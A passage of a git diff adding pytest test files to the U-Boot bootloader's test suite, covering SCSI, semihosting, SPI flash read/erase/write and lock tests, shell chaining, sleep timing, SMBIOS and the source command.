+@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_part(ubman): + test_scsi_dev(ubman) + output = ubman.run_command('scsi part') + assert 'Partition Map for scsi device' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_semihosting/conftest.py b/test/py/tests/test_semihosting/conftest.py new file mode 100644 index 00000000000..b00d8f4ea9c --- /dev/null +++ b/test/py/tests/test_semihosting/conftest.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Fixture for semihosting command test +""" + +import os +import pytest + +@pytest.fixture(scope='session') +def semihosting_data(u_boot_config): + """Set up a file system to be used in semihosting tests + + Args: + u_boot_config -- U-Boot configuration. + """ + image_path = u_boot_config.persistent_data_dir + '/semihosting.txt' + + with open(image_path, 'w', encoding = 'utf-8') as file: + file.write('Das U-Boot\n') + + yield image_path + + os.remove(image_path) diff --git a/test/py/tests/test_semihosting/test_hostfs.py b/test/py/tests/test_semihosting/test_hostfs.py new file mode 100644 index 00000000000..1bead69b507 --- /dev/null +++ b/test/py/tests/test_semihosting/test_hostfs.py @@ -0,0 +1,33 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for semihosting +""" + +import pytest + +@pytest.mark.buildconfigspec('semihosting') +def test_semihosting_hostfs(ubman, semihosting_data): + """ Unit test for semihosting + + Args: + ubman -- U-Boot console + semihosting_data -- Path to the disk image used for testing. + """ + response = ubman.run_command( + f'load hostfs - $loadaddr {semihosting_data}') + assert '11 bytes read' in response + + response = ubman.run_command( + 'crc32 $loadaddr $filesize') + assert '==> 60cfccfc' in response + + ubman.run_command( + f'save hostfs - $loadaddr {semihosting_data} 11 11') + + response = ubman.run_command( + f'load hostfs - $loadaddr {semihosting_data} 4 13') + assert '4 bytes read' in response + + response = ubman.run_command( + 'crc32 $loadaddr $filesize') + assert '==> e29063ea' in response diff --git a/test/py/tests/test_sf.py b/test/py/tests/test_sf.py new file mode 100644 index 00000000000..5b4ba80f18b --- /dev/null +++ b/test/py/tests/test_sf.py @@ -0,0 +1,217 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, Xilinx Inc. Michal Simek +# Copyright (c) 2017, Xiphos Systems Corp. All rights reserved. + +import re +import pytest +import random +import utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +which SPI Flash areas are available for testing. Without this, this test will +be automatically skipped. +For example: + +# A list of sections of Flash memory to be tested. +env__sf_configs = ( + { + # Where in SPI Flash should the test operate. + 'offset': 0x00000000, + # This value is optional. + # If present, specifies the [[bus:]cs] argument used in `sf probe` + # If missing, defaults to 0. + 'id': '0:1', + # This value is optional. + # If set as a number, specifies the speed of the SPI Flash. + # If set as an array of 2, specifies a range for a random speed. + # If missing, defaults to 0. + 'speed': 1000000, + # This value is optional. + # If present, specifies the size to use for read/write operations. + # If missing, the SPI Flash page size is used as a default (based on + # the `sf probe` output). + 'len': 0x10000, + # This value is optional. + # If present, specifies if the test can write to Flash offset + # If missing, defaults to False. + 'writeable': False, + # This value is optional. + # If present, specifies the expected CRC32 value of the flash area. + # If missing, extra check is ignored. + 'crc32': 0xCAFECAFE, + }, +) +""" + +def sf_prepare(ubman, env__sf_config): + """Check global state of the SPI Flash before running any test. + + Args: + ubman: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + + Returns: + sf_params: a dictionary of SPI Flash parameters. + """ + + sf_params = {} + sf_params['ram_base'] = utils.find_ram_base(ubman) + + probe_id = env__sf_config.get('id', 0) + speed = env__sf_config.get('speed', 0) + if isinstance(speed, int): + sf_params['speed'] = speed + else: + assert len(speed) == 2, "If speed is a list, it must have 2 entries" + sf_params['speed'] = random.randint(speed[0], speed[1]) + + cmd = 'sf probe %d %d' % (probe_id, sf_params['speed']) + + output = ubman.run_command(cmd) + assert 'SF: Detected' in output, 'No Flash device available' + + m = re.search('page size (.+?) Bytes', output) + assert m, 'SPI Flash page size not recognized' + sf_params['page_size'] = int(m.group(1)) + + m = re.search('erase size (.+?) KiB', output) + assert m, 'SPI Flash erase size not recognized' + sf_params['erase_size'] = int(m.group(1)) + sf_params['erase_size'] *= 1024 + + m = re.search('total (.+?) MiB', output) + assert m, 'SPI Flash total size not recognized' + sf_params['total_size'] = int(m.group(1)) + sf_params['total_size'] *= 1024 * 1024 + + assert 'offset' in env__sf_config, \ + '\'offset\' is required for this test.' + sf_params['len'] = env__sf_config.get('len', sf_params['erase_size']) + + assert not env__sf_config['offset'] % sf_params['erase_size'], \ + 'offset not multiple of erase size.' + assert not sf_params['len'] % sf_params['erase_size'], \ + 'erase length not multiple of erase size.' + + assert not (env__sf_config.get('writeable', False) and + 'crc32' in env__sf_config), \ + 'Cannot check crc32 on writeable sections' + + return sf_params + +def sf_read(ubman, env__sf_config, sf_params): + """Helper function used to read and compute the CRC32 value of a section of + SPI Flash memory. + + Args: + ubman: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + sf_params: SPI Flash parameters. + + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = random.randint(0, 0xFF) + crc_expected = env__sf_config.get('crc32', None) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + ubman.run_command(cmd) + crc_pattern = utils.crc32(ubman, addr, count) + if crc_expected: + assert crc_pattern != crc_expected + + cmd = 'sf read %08x %08x %x' % (addr, offset, count) + response = ubman.run_command(cmd) + assert 'Read: OK' in response, 'Read operation failed' + crc_readback = utils.crc32(ubman, addr, count) + assert crc_pattern != crc_readback, 'sf read did not update RAM content.' + if crc_expected: + assert crc_readback == crc_expected + + return crc_readback + +def sf_update(ubman, env__sf_config, sf_params): + """Helper function used to update a section of SPI Flash memory. + + Args: + ubman: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = int(random.random() * 0xFF) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + ubman.run_command(cmd) + crc_pattern = utils.crc32(ubman, addr, count) + + cmd = 'sf update %08x %08x %x' % (addr, offset, count) + ubman.run_command(cmd) + crc_readback = sf_read(ubman, env__sf_config, sf_params) + + assert crc_readback == crc_pattern + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read(ubman, env__sf_config): + sf_params = sf_prepare(ubman, env__sf_config) + sf_read(ubman, env__sf_config, sf_params) + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read_twice(ubman, env__sf_config): + sf_params = sf_prepare(ubman, env__sf_config) + + crc1 = sf_read(ubman, env__sf_config, sf_params) + sf_params['ram_base'] += 0x100 + crc2 = sf_read(ubman, env__sf_config, sf_params) + + assert crc1 == crc2, 'CRC32 of two successive read operation do not match' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_erase(ubman, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(ubman, env__sf_config) + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + + cmd = 'sf erase %08x %x' % (offset, count) + output = ubman.run_command(cmd) + assert 'Erased: OK' in output, 'Erase operation failed' + + cmd = 'mw.b %08x ff %x' % (addr, count) + ubman.run_command(cmd) + crc_ffs = utils.crc32(ubman, addr, count) + + crc_read = sf_read(ubman, env__sf_config, sf_params) + assert crc_ffs == crc_read, 'Unexpected CRC32 after erase operation.' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_update(ubman, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(ubman, env__sf_config) + sf_update(ubman, env__sf_config, sf_params) diff --git a/test/py/tests/test_shell_basics.py b/test/py/tests/test_shell_basics.py new file mode 100644 index 00000000000..97e22af5da5 --- /dev/null +++ b/test/py/tests/test_shell_basics.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test basic shell functionality, such as commands separate by semi-colons. + +import pytest + +pytestmark = pytest.mark.buildconfigspec('cmd_echo') + +def test_shell_execute(ubman): + """Test any shell command.""" + + response = ubman.run_command('echo hello') + assert response.strip() == 'hello' + +def test_shell_semicolon_two(ubman): + """Test two shell commands separate by a semi-colon.""" + + cmd = 'echo hello; echo world' + response = ubman.run_command(cmd) + # This validation method ignores the exact whitespace between the strings + assert response.index('hello') < response.index('world') + +def test_shell_semicolon_three(ubman): + """Test three shell commands separate by a semi-colon, with variable + expansion dependencies between them.""" + + cmd = 'setenv list 1; setenv list ${list}2; setenv list ${list}3; ' + \ + 'echo ${list}' + response = ubman.run_command(cmd) + assert response.strip() == '123' + ubman.run_command('setenv list') + +def test_shell_run(ubman): + """Test the "run" shell command.""" + + ubman.run_command('setenv foo \'setenv monty 1; setenv python 2\'') + ubman.run_command('run foo') + response = ubman.run_command('echo ${monty}') + assert response.strip() == '1' + response = ubman.run_command('echo ${python}') + assert response.strip() == '2' + ubman.run_command('setenv foo') + ubman.run_command('setenv monty') + ubman.run_command('setenv python') diff --git a/test/py/tests/test_sleep.py b/test/py/tests/test_sleep.py new file mode 100644 index 00000000000..f1bf34e05b2 --- /dev/null +++ b/test/py/tests/test_sleep.py @@ -0,0 +1,61 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import time + +""" +Note: This test doesn't rely on boardenv_* configuration values but they can +change test behavior. + +# Setup env__sleep_accurate to False if time is not accurate on your platform +env__sleep_accurate = False + +# Setup env__sleep_time time in seconds board is set to sleep +env__sleep_time = 3 + +# Setup env__sleep_margin set a margin for any system overhead +env__sleep_margin = 0.25 + +""" + +def test_sleep(ubman): + """Test the sleep command, and validate that it sleeps for approximately + the correct amount of time.""" + + sleep_skip = ubman.config.env.get('env__sleep_accurate', True) + if not sleep_skip: + pytest.skip('sleep is not accurate') + + if ubman.config.buildconfig.get('config_cmd_sleep', 'n') != 'y': + pytest.skip('sleep command not supported') + + # 3s isn't too long, but is enough to cross a few second boundaries. + sleep_time = ubman.config.env.get('env__sleep_time', 3) + sleep_margin = ubman.config.env.get('env__sleep_margin', 0.25) + tstart = time.time() + ubman.run_command('sleep %d' % sleep_time) + tend = time.time() + elapsed = tend - tstart + assert elapsed >= (sleep_time - 0.01) + if not ubman.config.gdbserver: + # margin is hopefully enough to account for any system overhead. + assert elapsed < (sleep_time + sleep_margin) + +@pytest.mark.buildconfigspec("cmd_time") +def test_time(ubman): + """Test the time command, and validate that it gives approximately the + correct amount of command execution time.""" + + sleep_skip = ubman.config.env.get("env__sleep_accurate", True) + if not sleep_skip: + pytest.skip("sleep is not accurate") + + sleep_time = ubman.config.env.get("env__sleep_time", 10) + sleep_margin = ubman.config.env.get("env__sleep_margin", 0.25) + output = ubman.run_command("time sleep %d" % sleep_time) + execute_time = float(output.split()[1]) + assert sleep_time >= (execute_time - 0.01) + if not ubman.config.gdbserver: + # margin is hopefully enough to account for any system overhead. + assert sleep_time < (execute_time + sleep_margin) diff --git a/test/py/tests/test_smbios.py b/test/py/tests/test_smbios.py new file mode 100644 index 00000000000..3b85a7cc661 --- /dev/null +++ b/test/py/tests/test_smbios.py @@ -0,0 +1,57 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Test smbios command""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.notbuildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +def test_cmd_smbios(ubman): + """Run the smbios command""" + output = ubman.run_command('smbios') + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +# TODO: +# QEMU v8.2.0 lacks SMBIOS support for RISC-V +# Once support is available in our Docker image we can remove the constraint. +@pytest.mark.notbuildconfigspec('riscv') +def test_cmd_smbios_qemu(ubman): + """Run the smbios command on QEMU""" + output = ubman.run_command('smbios') + assert 'DMI type 1,' in output + assert 'Manufacturer: QEMU' in output + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('sandbox') +def test_cmd_smbios_sandbox(ubman): + """Run the smbios command on the sandbox""" + output = ubman.run_command('smbios') + assert 'DMI type 0,' in output + assert 'Vendor: U-Boot' in output + assert 'DMI type 1,' in output + assert 'Manufacturer: sandbox' in output + assert 'DMI type 2,' in output + assert 'DMI type 3,' in output + assert 'DMI type 4,' in output + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('sysinfo_smbios') +@pytest.mark.buildconfigspec('generate_smbios_table_verbose') +def test_cmd_smbios_sysinfo_verbose(ubman): + """Run the smbios command""" + output = ubman.run_command('smbios') + assert 'DMI type 0,' in output + assert 'Vendor: U-Boot' in output + assert 'DMI type 1,' in output + assert 'Manufacturer: linux' in output + assert 'DMI type 2,' in output + assert 'DMI type 3,' in output + assert 'DMI type 7,' in output + assert 'DMI type 4,' in output + assert 'DMI type 127,' in output diff --git a/test/py/tests/test_source.py b/test/py/tests/test_source.py new file mode 100644 index 00000000000..970d8c79869 --- /dev/null +++ b/test/py/tests/test_source.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Sean Anderson <sean.anderson@seco.com> + +import os +import pytest +import utils + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_source') +@pytest.mark.buildconfigspec('fit') +def test_source(ubman): + # Compile our test script image + mkimage = os.path.join(ubman.config.build_dir, 'tools/mkimage') + its = os.path.join(ubman.config.source_dir, 'test/py/tests/source.its') + fit = os.path.join(ubman.config.build_dir, 'source.itb') + utils.run_and_log(ubman, (mkimage, '-f', its, fit)) + ubman.run_command(f'host load hostfs - $loadaddr {fit}') + + assert '2' in ubman.run_command('source') + assert '1' in ubman.run_command('source :') + assert '1' in ubman.run_command('source :script-1') + assert '2' in ubman.run_command('source :script-2') + assert 'Fail' in ubman.run_command('source :not-a-script || echo Fail') + assert '2' in ubman.run_command('source \\#') + assert '1' in ubman.run_command('source \\#conf-1') + assert '2' in ubman.run_command('source \\#conf-2') + + ubman.run_command('fdt addr $loadaddr') + ubman.run_command('fdt rm /configurations default') + assert '1' in ubman.run_command('source') + assert 'Fail' in ubman.run_command('source \\# || echo Fail') + + ubman.run_command('fdt rm /images default') + assert 'Fail' in ubman.run_command('source || echo Fail') + assert 'Fail' in ubman.run_command('source \\# || echo Fail') diff --git a/test/py/tests/test_spi.py b/test/py/tests/test_spi.py new file mode 100644 index 00000000000..dd767528dbf --- /dev/null +++ b/test/py/tests/test_spi.py @@ -0,0 +1,706 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2024, Advanced Micro Devices, Inc. + +""" +Note: This test relies on boardenv_* containing configuration values to define +spi minimum and maximum frequencies at which the flash part can operate on and +these tests run at different spi frequency randomised values in the range +multiple times based on the user defined iteration value. +It also defines the SPI bus number containing the SPI-flash chip, SPI +chip-select, SPI mode, SPI flash part name and timeout parameters. If minimum +and maximum frequency is not defined, it will run on freq 0 by default. + +Without the boardenv_* configuration, this test will be automatically skipped. + +It also relies on configuration values for supported flashes for lock and +unlock cases for SPI family flash. It will run lock-unlock cases only for the +supported flash parts. + +For Example: + +# Details of SPI device test parameters required for SPI device testing: + +# bus - SPI bus number to init the flash device +# chip_select - SPI chip select number to init the flash device +# min_freq - Minimum frequency in hz at which the flash part can operate, set 0 +# or None for default frequency +# max_freq - Maximum frequency in hz at which the flash part can operate, set 0 +# or None for default frequency +# mode - SPI mode to init the flash device +# part_name - SPI flash part name to be detected +# timeout - Default timeout to run the sf commands +# iteration - No of iteration to run SPI flash test + +env__spi_device_test = { + 'bus': 0, + 'chip_select': 0, + 'min_freq': 10000000, + 'max_freq': 100000000, + 'mode': 0, + 'part_name': 'n25q00a', + 'timeout': 100000, + 'iteration': 5, +} + +# supported_flash - Flash parts name which support lock-unlock functionality +env__spi_lock_unlock = { + 'supported_flash': 'mt25qu512a, n25q00a, n25q512ax3', +} +""" + +import random +import re +import pytest +import utils + +SPI_DATA = {} +EXPECTED_ERASE = 'Erased: OK' +EXPECTED_WRITE = 'Written: OK' +EXPECTED_READ = 'Read: OK' +EXPECTED_ERASE_ERRORS = [ + 'Erase operation failed', + 'Attempted to modify a protected sector', + 'Erased: ERROR', + 'is protected and cannot be erased', + 'ERROR: flash area is locked', +] +EXPECTED_WRITE_ERRORS = [ + 'ERROR: flash area is locked', + 'Program operation failed', + 'Attempted to modify a protected sector', + 'Written: ERROR', +] + +def get_params_spi(ubman): + ''' Get SPI device test parameters from boardenv file ''' + f = ubman.config.env.get('env__spi_device_test', None) + if not f: + pytest.skip('No SPI test device configured') + + bus = f.get('bus', 0) + cs = f.get('chip_select', 0) + mode = f.get('mode', 0) + part_name = f.get('part_name', None) + timeout = f.get('timeout', None) + + if not part_name: + pytest.skip('No SPI test device configured') + + return bus, cs, mode, part_name, timeout + +def spi_find_freq_range(ubman): + '''Find out minimum and maximum frequnecies that SPI device can operate''' + f = ubman.config.env.get('env__spi_device_test', None) + if not f: + pytest.skip('No SPI test device configured') + + min_f = f.get('min_freq', None) + max_f = f.get('max_freq', None) + iterations = f.get('iteration', 1) + + if not min_f: + min_f = 0 + if not max_f: + max_f = 0 + + max_f = max(max_f, min_f) + + return min_f, max_f, iterations + +def spi_pre_commands(ubman, freq): + ''' Find out SPI family flash memory parameters ''' + bus, cs, mode, part_name, timeout = get_params_spi(ubman) + + output = ubman.run_command(f'sf probe {bus}:{cs} {freq} {mode}') + if not 'SF: Detected' in output: + pytest.fail('No SPI device available') + + if not part_name in output: + pytest.fail('Not recognized the SPI flash part name') + + m = re.search('page size (.+?) Bytes', output) + assert m + try: + page_size = int(m.group(1)) + except ValueError: + pytest.fail('Not recognized the SPI page size') + + m = re.search('erase size (.+?) KiB', output) + assert m + try: + erase_size = int(m.group(1)) + erase_size *= 1024 + except ValueError: + pytest.fail('Not recognized the SPI erase size') + + m = re.search('total (.+?) MiB', output) + assert m + try: + total_size = int(m.group(1)) + total_size *= 1024 * 1024 + except ValueError: + pytest.fail('Not recognized the SPI total size') + + m = re.search('Detected (.+?) with', output) + assert m + try: + flash_part = m.group(1) + assert flash_part == part_name + except ValueError: + pytest.fail('Not recognized the SPI flash part') + + global SPI_DATA + SPI_DATA = { + 'page_size': page_size, + 'erase_size': erase_size, + 'total_size': total_size, + 'flash_part': flash_part, + 'timeout': timeout, + } + +def get_page_size(): + ''' Get the SPI page size from spi data ''' + return SPI_DATA['page_size'] + +def get_erase_size(): + ''' Get the SPI erase size from spi data ''' + return SPI_DATA['erase_size'] + +def get_total_size(): + ''' Get the SPI total size from spi data ''' + return SPI_DATA['total_size'] + +def get_flash_part(): + ''' Get the SPI flash part name from spi data ''' + return SPI_DATA['flash_part'] + +def get_timeout(): + ''' Get the SPI timeout from spi data ''' + return SPI_DATA['timeout'] + +def spi_erase_block(ubman, erase_size, total_size): + ''' Erase SPI flash memory block wise ''' + for start in range(0, total_size, erase_size): + output = ubman.run_command(f'sf erase {hex(start)} {hex(erase_size)}') + assert EXPECTED_ERASE in output + +@pytest.mark.buildconfigspec('cmd_sf') +def test_spi_erase_block(ubman): + ''' Test case to check SPI erase functionality by erasing memory regions + block-wise ''' + + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_erase_block(ubman, get_erase_size(), get_total_size()) + i = i + 1 + +def spi_write_twice(ubman, page_size, erase_size, total_size, timeout): + ''' Random write till page size, random till size and full size ''' + addr = utils.find_ram_base(ubman) + + old_size = 0 + for size in ( + random.randint(4, page_size), + random.randint(page_size, total_size), + total_size, + ): + offset = random.randint(4, page_size) + offset = offset & ~3 + size = size & ~3 + size = size - old_size + output = ubman.run_command(f'crc32 {hex(addr + total_size)} {hex(size)}') + m = re.search('==> (.+?)$', output) + if not m: + pytest.fail('CRC32 failed') + + expected_crc32 = m.group(1) + if old_size % page_size: + old_size = int(old_size / page_size) + old_size *= page_size + + if size % erase_size: + erasesize = int(size / erase_size + 1) + erasesize *= erase_size + + eraseoffset = int(old_size / erase_size) + eraseoffset *= erase_size + + timeout = 100000000 + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf erase {hex(eraseoffset)} {hex(erasesize)}' + ) + assert EXPECTED_ERASE in output + + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf write {hex(addr + total_size)} {hex(old_size)} {hex(size)}' + ) + assert EXPECTED_WRITE in output + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + total_size + offset)} {hex(old_size)} {hex(size)}' + ) + assert EXPECTED_READ in output + output = ubman.run_command( + f'crc32 {hex(addr + total_size + offset)} {hex(size)}' + ) + assert expected_crc32 in output + old_size = size + +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_write_twice(ubman): + ''' Test to write data with random size twice for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_write_twice( + ubman, + get_page_size(), + get_erase_size(), + get_total_size(), + get_timeout() + ) + i = i + 1 + +def spi_write_continues(ubman, page_size, erase_size, total_size, timeout): + ''' Write with random size of data to continue SPI write case ''' + spi_erase_block(ubman, erase_size, total_size) + addr = utils.find_ram_base(ubman) + + output = ubman.run_command(f'crc32 {hex(addr + 0x10000)} {hex(total_size)}') + m = re.search('==> (.+?)$', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + old_size = 0 + for size in ( + random.randint(4, page_size), + random.randint(page_size, total_size), + total_size, + ): + size = size & ~3 + size = size - old_size + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf write {hex(addr + 0x10000 + old_size)} {hex(old_size)} {hex(size)}' + ) + assert EXPECTED_WRITE in output + old_size += size + + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + 0x10000 + total_size)} 0 {hex(total_size)}' + ) + assert EXPECTED_READ in output + + output = ubman.run_command( + f'crc32 {hex(addr + 0x10000 + total_size)} {hex(total_size)}' + ) + assert expected_crc32 in output + +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_write_continues(ubman): + ''' Test to write more random size data for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_write_twice( + ubman, + get_page_size(), + get_erase_size(), + get_total_size(), + get_timeout(), + ) + i = i + 1 + +def spi_read_twice(ubman, page_size, total_size, timeout): + ''' Read the whole SPI flash twice, random_size till full flash size, + random till page size ''' + for size in random.randint(4, page_size), random.randint(4, total_size), total_size: + addr = utils.find_ram_base(ubman) + size = size & ~3 + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + total_size)} 0 {hex(size)}' + ) + assert EXPECTED_READ in output + output = ubman.run_command(f'crc32 {hex(addr + total_size)} {hex(size)}') + m = re.search('==> (.+?)$', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + total_size + 10)} 0 {hex(size)}' + ) + assert EXPECTED_READ in output + output = ubman.run_command( + f'crc32 {hex(addr + total_size + 10)} {hex(size)}' + ) + assert expected_crc32 in output + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_read_twice(ubman): + ''' Test to read random data twice from SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_read_twice(ubman, get_page_size(), get_total_size(), get_timeout()) + i = i + 1 + +def spi_erase_all(ubman, total_size, timeout): + ''' Erase the full chip SPI ''' + start = 0 + with ubman.temporary_timeout(timeout): + output = ubman.run_command(f'sf erase {start} {hex(total_size)}') + assert EXPECTED_ERASE in output + +@pytest.mark.buildconfigspec('cmd_sf') +def test_spi_erase_all(ubman): + ''' Test to check full chip erase for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_erase_all(ubman, get_total_size(), get_timeout()) + i = i + 1 + +def flash_ops( + ubman, ops, start, size, offset=0, exp_ret=0, exp_str='', not_exp_str='' +): + ''' Flash operations: erase, write and read ''' + + f = ubman.config.env.get('env__spi_device_test', None) + if not f: + timeout = 1000000 + + timeout = f.get('timeout', 1000000) + + if ops == 'erase': + with ubman.temporary_timeout(timeout): + output = ubman.run_command(f'sf erase {hex(start)} {hex(size)}') + else: + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf {ops} {hex(offset)} {hex(start)} {hex(size)}' + ) + + if exp_str: + assert exp_str in output + if not_exp_str: + assert not_exp_str not in output + + ret_code = ubman.run_command('echo $?') + if exp_ret >= 0: + assert ret_code.endswith(str(exp_ret)) + + return output, ret_code + +def spi_unlock_exit(ubman, addr, size): + ''' Unlock the flash before making it fail ''' + ubman.run_command(f'sf protect unlock {hex(addr)} {hex(size)}') + assert False, 'FAIL: Flash lock is unable to protect the data!' + +def find_prot_region(lock_addr, lock_size): + ''' Get the protected and un-protected region of flash ''' + total_size = get_total_size() + erase_size = get_erase_size() + + if lock_addr < (total_size // 2): + sect_num = (lock_addr + lock_size) // erase_size + x = 1 + while x < sect_num: + x *= 2 + prot_start = 0 + prot_size = x * erase_size + unprot_start = prot_start + prot_size + unprot_size = total_size - unprot_start + else: + sect_num = (total_size - lock_addr) // erase_size + x = 1 + while x < sect_num: + x *= 2 + prot_start = total_size - (x * erase_size) + prot_size = total_size - prot_start + unprot_start = 0 + unprot_size = prot_start + + return prot_start, prot_size, unprot_start, unprot_size + +def protect_ops(ubman, lock_addr, lock_size, ops="unlock"): + ''' Run the command to lock or Unlock the flash ''' + ubman.run_command(f'sf protect {ops} {hex(lock_addr)} {hex(lock_size)}') + output = ubman.run_command('echo $?') + if ops == "lock" and not output.endswith('0'): + ubman.run_command(f'sf protect unlock {hex(lock_addr)} {hex(lock_size)}') + assert False, "sf protect lock command exits with non-zero return code" + assert output.endswith('0') + +def erase_write_ops(ubman, start, size): + ''' Basic erase and write operation for flash ''' + addr = utils.find_ram_base(ubman) + flash_ops(ubman, 'erase', start, size, 0, 0, EXPECTED_ERASE) + flash_ops(ubman, 'write', start, size, addr, 0, EXPECTED_WRITE) + +def spi_lock_unlock(ubman, lock_addr, lock_size): + ''' Lock unlock operations for SPI family flash ''' + addr = utils.find_ram_base(ubman) + erase_size = get_erase_size() + + # Find the protected/un-protected region + prot_start, prot_size, unprot_start, unprot_size = find_prot_region(lock_addr, lock_size) + + # Check erase/write operation before locking + erase_write_ops(ubman, prot_start, prot_size) + + # Locking the flash + protect_ops(ubman, lock_addr, lock_size, 'lock') + + # Check erase/write operation after locking + output, ret_code = flash_ops(ubman, 'erase', prot_start, prot_size, 0, -1) + if not any(error in output for error in EXPECTED_ERASE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + output, ret_code = flash_ops( + ubman, 'write', prot_start, prot_size, addr, -1 + ) + if not any(error in output for error in EXPECTED_WRITE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + # Check locked sectors + sect_lock_start = random.randrange(prot_start, (prot_start + prot_size), erase_size) + if prot_size > erase_size: + sect_lock_size = random.randrange( + erase_size, (prot_start + prot_size - sect_lock_start), erase_size + ) + else: + sect_lock_size = erase_size + sect_write_size = random.randint(1, sect_lock_size) + + output, ret_code = flash_ops( + ubman, 'erase', sect_lock_start, sect_lock_size, 0, -1 + ) + if not any(error in output for error in EXPECTED_ERASE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + output, ret_code = flash_ops( + ubman, 'write', sect_lock_start, sect_write_size, addr, -1 + ) + if not any(error in output for error in EXPECTED_WRITE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + # Check unlocked sectors + if unprot_size != 0: + sect_unlock_start = random.randrange( + unprot_start, (unprot_start + unprot_size), erase_size + ) + if unprot_size > erase_size: + sect_unlock_size = random.randrange( + erase_size, (unprot_start + unprot_size - sect_unlock_start), erase_size + ) + else: + sect_unlock_size = erase_size + sect_write_size = random.randint(1, sect_unlock_size) + + output, ret_code = flash_ops( + ubman, 'erase', sect_unlock_start, sect_unlock_size, 0, -1 + ) + if EXPECTED_ERASE not in output or ret_code.endswith('1'): + spi_unlock_exit(ubman, lock_addr, lock_size) + + output, ret_code = flash_ops( + ubman, 'write', 